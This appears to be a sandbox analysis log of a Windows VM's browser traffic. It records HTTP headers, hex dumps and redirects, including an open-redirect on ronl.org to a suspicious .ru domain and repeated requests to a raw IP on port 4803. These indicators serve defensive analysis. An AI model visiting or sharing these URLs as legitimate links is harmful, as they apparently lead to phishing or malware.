                                                                          Cache-Control: max-age=68301
                                                                          Expires: Wed, 05 Mar 2025 12:23:37 GMT
                                                                          Date: Tue, 04 Mar 2025 17:25:16 GMT
                                                                          Content-Length: 1391
                                                                          Connection: keep-alive
                                                                          Data Raw: 30 82 05 6b 30 82 03 53 a0 03 02 01 02 02 11 00 82 10 cf b0 d2 40 e3 59 44 63 e0 bb 63 82 8b 00 30 0d 06 09 2a 86 48 86 f7 0d 01 01 0b 05 00 30 4f 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 29 30 27 06 03 55 04 0a 13 20 49 6e 74 65 72 6e 65 74 20 53 65 63 75 72 69 74 79 20 52 65 73 65 61 72 63 68 20 47 72 6f 75 70 31 15 30 13 06 03 55 04 03 13 0c 49 53 52 47 20 52 6f 6f 74 20 58 31 30 1e 17 0d 31 35 30 36 30 34 31 31 30 34 33 38 5a 17 0d 33 35 30 36 30 34 31 31 30 34 33 38 5a 30 4f 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 29 30 27 06 03 55 04 0a 13 20 49 6e 74 65 72 6e 65 74 20 53 65 63 75 72 69 74 79 20 52 65 73 65 61 72 63 68 20 47 72 6f 75 70 31 15 30 13 06 03 55 04 03 13 0c 49 53 52 47 20 52 6f 6f 74 20 58 31 30 82 02 22 30 0d 06 09 2a 86 48 86 f7 0d 01 01 01 05 00 03 82 02 0f 00 30 82 02 0a 02 82 02 01 00 ad e8 24 73 f4 14 37 f3 9b 9e 2b 57 28 1c 87 be dc b7 df 38 90 8c 6e 3c e6 57 a0 78 f7 75 c2 a2 fe f5 6a 6e f6 00 4f 28 db de 68 86 6c 44 93 b6 b1 63 fd 14 12 6b bf 1f d2 ea 31 9b 21 7e d1 33 [TRUNCATED]
                                                                          Data Ascii: 0k0S@YDcc0*H0O10UUS1)0'U Internet Security Research Group10UISRG Root X10150604110438Z350604110438Z0O10UUS1)0'U Internet Security Research Group10UISRG Root X10"0*H0$s7+W(8n<WxujnO(hlDck1!~3<Hy!KqiJffl~<p)"K~G|H#S8Oo.IWt/8{p!u0<cOK~w.{JL%p)S$J?aQcq.o[\4ylv;by/&676urI*Av5/(ldwnG7Y^hrA)>Y>&$ZL@F:Qn;}rxY>Qx/>{JKsP|Ctt0[q600\H;}`)A|;FH*vvj=8d+(B"']ypN:'Qnd3COB0@0U0U00UyY{sXn0*HUX
                                                                          Mar 4, 2025 18:25:16.215146065 CET509INData Raw: a9 bc b2 a8 50 d0 0c b1 d8 1a 69 20 27 29 08 ac 61 75 5c 8a 6e f8 82 e5 69 2f d5 f6 56 4b b9 b8 73 10 59 d3 21 97 7e e7 4c 71 fb b2 d2 60 ad 39 a8 0b ea 17 21 56 85 f1 50 0e 59 eb ce e0 59 e9 ba c9 15 ef 86 9d 8f 84 80 f6 e4 e9 91 90 dc 17 9b 62
                                                                          Data Ascii: Pi ')au\ni/VKsY!~Lq`9!VPYYbEf|o;'}~"+"4[XT&3L-<W,N;1"ss993#L<U)"k;W:pMMl]+NEJ&rj


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          1192.168.2.64984515.197.142.173809112C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Mar 4, 2025 18:25:31.020153999 CET429OUTGET / HTTP/1.1
                                                                          Host: nelsoncourt.us
                                                                          Connection: keep-alive
                                                                          Upgrade-Insecure-Requests: 1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                          Accept-Encoding: gzip, deflate
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Mar 4, 2025 18:25:31.331192970 CET429OUTGET / HTTP/1.1
                                                                          Host: nelsoncourt.us
                                                                          Connection: keep-alive
                                                                          Upgrade-Insecure-Requests: 1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                          Accept-Encoding: gzip, deflate
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Mar 4, 2025 18:25:32.035602093 CET387INHTTP/1.1 301 Moved Permanently
                                                                          Date: Tue, 04 Mar 2025 17:25:31 GMT
                                                                          Content-Type: text/html; charset=utf-8
                                                                          Content-Length: 70
                                                                          Connection: keep-alive
                                                                          Location: http://74.7.84.190:4803/NelsonCourt
                                                                          Server: ip-10-123-124-171.ec2.internal
                                                                          Vary: Accept-Encoding
                                                                          X-Request-Id: eb7c17ba-e6c7-4d3f-907c-b8c867bf5a1f
                                                                          Data Raw: 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 37 34 2e 37 2e 38 34 2e 31 39 30 3a 34 38 30 33 2f 4e 65 6c 73 6f 6e 43 6f 75 72 74 22 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 61 3e 2e 0a 0a
                                                                          Data Ascii: <a href="http://74.7.84.190:4803/NelsonCourt">Moved Permanently</a>.
                                                                          Mar 4, 2025 18:26:17.048712015 CET6OUTData Raw: 00
                                                                          Data Ascii:


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          2192.168.2.64989274.7.84.19048039112C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Mar 4, 2025 18:25:35.056405067 CET442OUTGET /NelsonCourt HTTP/1.1
                                                                          Host: 74.7.84.190:4803
                                                                          Connection: keep-alive
                                                                          Upgrade-Insecure-Requests: 1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                          Accept-Encoding: gzip, deflate
                                                                          Accept-Language: en-US,en;q=0.9


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          3192.168.2.65003574.7.84.19048039112C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Mar 4, 2025 18:25:57.471189022 CET468OUTGET /NelsonCourt HTTP/1.1
                                                                          Host: 74.7.84.190:4803
                                                                          Connection: keep-alive
                                                                          Cache-Control: max-age=0
                                                                          Upgrade-Insecure-Requests: 1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                          Accept-Encoding: gzip, deflate
                                                                          Accept-Language: en-US,en;q=0.9


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          4192.168.2.64984615.197.142.173809112C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Mar 4, 2025 18:26:13.205394983 CET6OUTData Raw: 00
                                                                          Data Ascii:


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          5192.168.2.65003974.7.84.19048039112C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Mar 4, 2025 18:26:23.861057997 CET468OUTGET /NelsonCourt HTTP/1.1
                                                                          Host: 74.7.84.190:4803
                                                                          Connection: keep-alive
                                                                          Cache-Control: max-age=0
                                                                          Upgrade-Insecure-Requests: 1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                          Accept-Encoding: gzip, deflate
                                                                          Accept-Language: en-US,en;q=0.9


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          6192.168.2.65003874.7.84.19048039112C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Mar 4, 2025 18:26:45.226574898 CET468OUTGET /NelsonCourt HTTP/1.1
                                                                          Host: 74.7.84.190:4803
                                                                          Connection: keep-alive
                                                                          Cache-Control: max-age=0
                                                                          Upgrade-Insecure-Requests: 1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                          Accept-Encoding: gzip, deflate
                                                                          Accept-Language: en-US,en;q=0.9


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          7192.168.2.65004374.7.84.19048039112C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Mar 4, 2025 18:26:45.248132944 CET468OUTGET /NelsonCourt HTTP/1.1
                                                                          Host: 74.7.84.190:4803
                                                                          Connection: keep-alive
                                                                          Cache-Control: max-age=0
                                                                          Upgrade-Insecure-Requests: 1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                          Accept-Encoding: gzip, deflate
                                                                          Accept-Language: en-US,en;q=0.9


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          8192.168.2.65004874.7.84.19048039112C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Mar 4, 2025 18:27:36.652972937 CET468OUTGET /NelsonCourt HTTP/1.1
                                                                          Host: 74.7.84.190:4803
                                                                          Connection: keep-alive
                                                                          Cache-Control: max-age=0
                                                                          Upgrade-Insecure-Requests: 1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                          Accept-Encoding: gzip, deflate
                                                                          Accept-Language: en-US,en;q=0.9


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          9192.168.2.65004774.7.84.19048039112C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Mar 4, 2025 18:27:58.025156021 CET468OUTGET /NelsonCourt HTTP/1.1
                                                                          Host: 74.7.84.190:4803
                                                                          Connection: keep-alive
                                                                          Cache-Control: max-age=0
                                                                          Upgrade-Insecure-Requests: 1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                          Accept-Encoding: gzip, deflate
                                                                          Accept-Language: en-US,en;q=0.9


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          10192.168.2.65004974.7.84.19048039112C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Mar 4, 2025 18:27:58.035471916 CET468OUTGET /NelsonCourt HTTP/1.1
                                                                          Host: 74.7.84.190:4803
                                                                          Connection: keep-alive
                                                                          Cache-Control: max-age=0
                                                                          Upgrade-Insecure-Requests: 1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                          Accept-Encoding: gzip, deflate
                                                                          Accept-Language: en-US,en;q=0.9


                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                          0192.168.2.64970840.113.110.67443
                                                                          TimestampBytes transferredDirectionData
                                                                          2025-03-04 17:25:01 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 50 4d 6f 77 51 6f 45 62 42 6b 57 30 50 35 6f 33 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 36 63 39 37 62 38 30 37 65 65 37 64 66 31 66 34 0d 0a 0d 0a
                                                                          Data Ascii: CNT 1 CON 305MS-CV: PMowQoEbBkW0P5o3.1Context: 6c97b807ee7df1f4
                                                                          2025-03-04 17:25:01 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                                                                          Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                                                                          2025-03-04 17:25:01 UTC1076OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 35 33 0d 0a 4d 53 2d 43 56 3a 20 50 4d 6f 77 51 6f 45 62 42 6b 57 30 50 35 6f 33 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 36 63 39 37 62 38 30 37 65 65 37 64 66 31 66 34 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 77 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 58 7a 55 45 6b 33 4e 66 59 68 39 44 37 4a 45 5a 56 62 6c 51 70 7a 62 55 68 49 35 31 6e 4c 71 31 6c 79 78 73 49 65 70 6c 50 58 6f 72 4f 79 52 49 56 48 6e 75 53 2b 51 69 6e 32 63 6a 51 38 47 78 6c 52 66 65 2f 66 72 53 38 6e 4e 35 33 45 6b 50 56 49 67 5a 54 76 4c 63 7a 43 74 4b 2f 74 4b 78 6b 4e 6c 45 66 39 33 48 61 4b 43 39 4b
                                                                          Data Ascii: ATH 2 CON\DEVICE 1053MS-CV: PMowQoEbBkW0P5o3.2Context: 6c97b807ee7df1f4<device><compact-ticket>t=EwCwAupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAXzUEk3NfYh9D7JEZVblQpzbUhI51nLq1lyxsIeplPXorOyRIVHnuS+Qin2cjQ8GxlRfe/frS8nN53EkPVIgZTvLczCtK/tKxkNlEf93HaKC9K
                                                                          2025-03-04 17:25:01 UTC218OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 50 4d 6f 77 51 6f 45 62 42 6b 57 30 50 35 6f 33 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 36 63 39 37 62 38 30 37 65 65 37 64 66 31 66 34 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e
                                                                          Data Ascii: BND 3 CON\WNS 0 197MS-CV: PMowQoEbBkW0P5o3.3Context: 6c97b807ee7df1f4<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
                                                                          2025-03-04 17:25:01 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                                                                          Data Ascii: 202 1 CON 58
                                                                          2025-03-04 17:25:01 UTC58INData Raw: 4d 53 2d 43 56 3a 20 35 6d 6a 55 6d 68 34 65 32 55 79 53 70 6f 64 4a 45 54 75 78 54 41 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                                                                          Data Ascii: MS-CV: 5mjUmh4e2UySpodJETuxTA.0Payload parsing failed.


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          1192.168.2.649716185.191.197.924437756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2025-03-04 17:25:08 UTC696OUTGET /redirect?url=https://1C.hypernesdt.ru/A86bjH/ HTTP/1.1
                                                                          Host: ronl.org
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Upgrade-Insecure-Requests: 1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                          Sec-Fetch-Site: none
                                                                          Sec-Fetch-Mode: navigate
                                                                          Sec-Fetch-User: ?1
                                                                          Sec-Fetch-Dest: document
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2025-03-04 17:25:08 UTC477INHTTP/1.1 301 Moved Permanently
                                                                          Date: Tue, 04 Mar 2025 17:25:08 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Content-Length: 0
                                                                          Connection: close
                                                                          Server: Apache/2.2.15 (CentOS)
                                                                          X-Powered-By: PHP/5.3.21
                                                                          Set-Cookie: PHPSESSID=7ibovd95avdr3a3p124l0glkv6; path=/
                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                          Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                          Pragma: no-cache
                                                                          Status: 301 Moved Permanently
                                                                          Location: https://1C.hypernesdt.ru/A86bjH/


                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                          2192.168.2.64971740.113.110.67443
                                                                          TimestampBytes transferredDirectionData
                                                                          2025-03-04 17:25:09 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 64 59 47 50 61 62 32 41 46 45 69 6f 32 43 38 2b 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 61 37 37 37 64 35 38 33 66 35 36 61 33 66 36 30 0d 0a 0d 0a
                                                                          Data Ascii: CNT 1 CON 305MS-CV: dYGPab2AFEio2C8+.1Context: a777d583f56a3f60
                                                                          2025-03-04 17:25:09 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                                                                          Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                                                                          2025-03-04 17:25:09 UTC1384OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 33 36 31 0d 0a 4d 53 2d 43 56 3a 20 64 59 47 50 61 62 32 41 46 45 69 6f 32 43 38 2b 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 61 37 37 37 64 35 38 33 66 35 36 61 33 66 36 30 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 59 41 2b 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 5a 55 65 4f 6f 45 75 6c 59 66 70 79 71 2b 46 2b 4d 62 77 51 2f 70 7a 47 61 58 39 36 66 51 71 56 47 77 2b 30 74 61 47 77 33 54 37 30 4c 36 56 47 56 72 75 4a 75 78 31 2b 38 53 59 36 4d 4f 45 30 36 37 77 34 38 66 65 45 59 7a 77 4a 5a 48 41 56 44 45 35 70 55 62 44 70 4b 45 31 38 64 66 79 37 39 4f 36 38 49 43 51 51 47 42 43 6d 76
                                                                          Data Ascii: ATH 2 CON\DEVICE 1361MS-CV: dYGPab2AFEio2C8+.2Context: a777d583f56a3f60<device><compact-ticket>t=EwCYA+pIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAZUeOoEulYfpyq+F+MbwQ/pzGaX96fQqVGw+0taGw3T70L6VGVruJux1+8SY6MOE067w48feEYzwJZHAVDE5pUbDpKE18dfy79O68ICQQGBCmv
                                                                          2025-03-04 17:25:09 UTC218OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 64 59 47 50 61 62 32 41 46 45 69 6f 32 43 38 2b 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 61 37 37 37 64 35 38 33 66 35 36 61 33 66 36 30 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e
                                                                          Data Ascii: BND 3 CON\WNS 0 197MS-CV: dYGPab2AFEio2C8+.3Context: a777d583f56a3f60<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
                                                                          2025-03-04 17:25:09 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                                                                          Data Ascii: 202 1 CON 58
                                                                          2025-03-04 17:25:09 UTC58INData Raw: 4d 53 2d 43 56 3a 20 74 43 30 37 36 64 42 48 66 30 6d 69 4b 70 79 74 62 57 38 74 47 41 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                                                                          Data Ascii: MS-CV: tC076dBHf0miKpytbW8tGA.0Payload parsing failed.


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          3192.168.2.649719188.114.96.34437756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2025-03-04 17:25:09 UTC666OUTGET /A86bjH/ HTTP/1.1
                                                                          Host: 1c.hypernesdt.ru
                                                                          Connection: keep-alive
                                                                          Upgrade-Insecure-Requests: 1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                          Sec-Fetch-Site: none
                                                                          Sec-Fetch-Mode: navigate
                                                                          Sec-Fetch-User: ?1
                                                                          Sec-Fetch-Dest: document
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2025-03-04 17:25:09 UTC1214INHTTP/1.1 200 OK
                                                                          Date: Tue, 04 Mar 2025 17:25:09 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          Cache-Control: no-cache, private
                                                                          cf-cache-status: DYNAMIC
                                                                          vary: accept-encoding
                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SMHhPcNiB3cVblxKf9d%2FN2VkavR%2FNSgjs3uHprreL05Lh1kFYRBJjlsan75m8G5fJd99H43i7WrTAIqZvuXkW22gcCXTJDpv61y%2F2ZJEts5J6KNx%2FilVFt7eq5dfi9fWXrBb"}],"group":"cf-nel","max_age":604800}
                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1130&min_rtt=1108&rtt_var=461&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2821&recv_bytes=1578&delivery_rate=2244961&cwnd=250&unsent_bytes=0&cid=ca7ef510b4042ce0&ts=149&x=0"
                                                                          Set-Cookie: XSRF-TOKEN=eyJpdiI6InBmZnliOVU1Ry9EM2NWRWRPdURLOWc9PSIsInZhbHVlIjoiKzU2ckN6ODZpOEhuSnlEcCtNOVluRHhsOUV4eXFTM0F1ZjhVQWlhTmQwbHNXUlNtakJ5dHR4dFlETG5FRmNlQVZFMXBUREtwNDJTTW1QeWxUOFA1bGorem9HcTE2bHFIdURGMlRIQ0xZZHVIWlJzN1BvUlpZem0zRmgzbmhaY1kiLCJtYWMiOiIzN2FhMjJmMWNkZmRhNjc5NTU4MTIyYTk0NDFkYTlkNmFjZDc0M2U0NThkNGIwYjljOTJjODBlZmEzODJiNjk3IiwidGFnIjoiIn0%3D; expires=Tue, 04-Mar-2025 19:25:09 GMT; Max-Age=7200; path=/; secure; samesite=none
